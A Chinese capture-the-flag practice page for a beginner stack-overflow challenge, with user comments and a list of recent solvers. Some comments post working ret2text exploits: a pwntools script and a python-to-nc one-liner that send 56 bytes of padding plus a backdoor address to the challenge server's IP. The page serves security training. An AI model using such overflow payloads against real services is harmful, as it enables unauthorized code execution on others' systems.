overflowPWN 未解决

分数: 20 金币: 4
题目作者: harry
一  血: blanc
一血奖励: 1金币
解  决: 2102
提  示:
描  述:
pwn2
其  他: 下载
评论
nirvana。 1月前

在虚拟机中下好文件后,用终端打开下载目录,用unzip file.zip解压文件,ls查看文件,发现解压得到文件名为pwn2,用file pwn2分析,接着用nano exp.py编写Python脚本,最后python3 exp.py执行,得到flag

回复 0

xtk 3月前

from pwn import * io=remote("171.80.2.169",17626) payload=b'a'*(0x30+8)+p64(0x400751) io.recvline("say something?\n") io.sendline(payload) io.interactive()栈溢出覆盖返回地址到后门函数就好了

回复 0

modeng 5月前

这是我的思路,希望能帮到你解题 https://blog.csdn.net/m_de_g/article/details/155747760?spm=1001.2014.3001.5502

回复 1

王安小子 5月前

python3 -c 'print("A"*56 + "\x51\x07\x40\x00\x00\x00\x00\x00")' | nc 171.80.2.169 15170 就ok

回复 0

乌鸦乌鸦乌鸦乌鸦 9月前

为什么答案是56字节,我测出来是40字节

回复 0
scust 9月前

看到main中char s[48]; // [rsp+0h] [rbp-30h] BYREF没?padding = 0x30+8 #epb占用8个字节

回复 1

weiyouzhunze 11月前

栈溢出漏洞利用

回复 0

afag 1年前

0x30+8填充

回复 0

17773146280 1年前

简单的ret2text题目,后门函数地址加上缓冲区长度就可以了

回复 0

YellowZy 1年前

应该是从stack of main里面看到s到r的距离还有8字节的偏移,所以应该是48+8=56字节填充

回复 0

255a 1年前

修改main函数返回地址的rcx的值

回复 0

WriteUp

image
Leuslu

9 金币

评分(2)

解题动态

jyyjyy 攻破了该题 22小时前
sagaasrqrqw 攻破了该题 1天前
cdw13705 攻破了该题 1天前
18663542119@ 攻破了该题 2天前
dl1d506 攻破了该题 2天前
asdwa 攻破了该题 2天前
xtelnet 攻破了该题 2天前
pcspcs 攻破了该题 3天前
shxch 攻破了该题 6天前
Gcysnd 攻破了该题 6天前
33332w2wws 攻破了该题 6天前
flag与她皆失 攻破了该题 6天前
jxh688 攻破了该题 7天前
yinlin 攻破了该题 7天前
KleinDoctor 攻破了该题 8天前
zchkk 攻破了该题 9天前
susanzht 攻破了该题 9天前
czd1 攻破了该题 9天前
樱染梦蝶 攻破了该题 10天前
barrynbsw 攻破了该题 10天前
问题反馈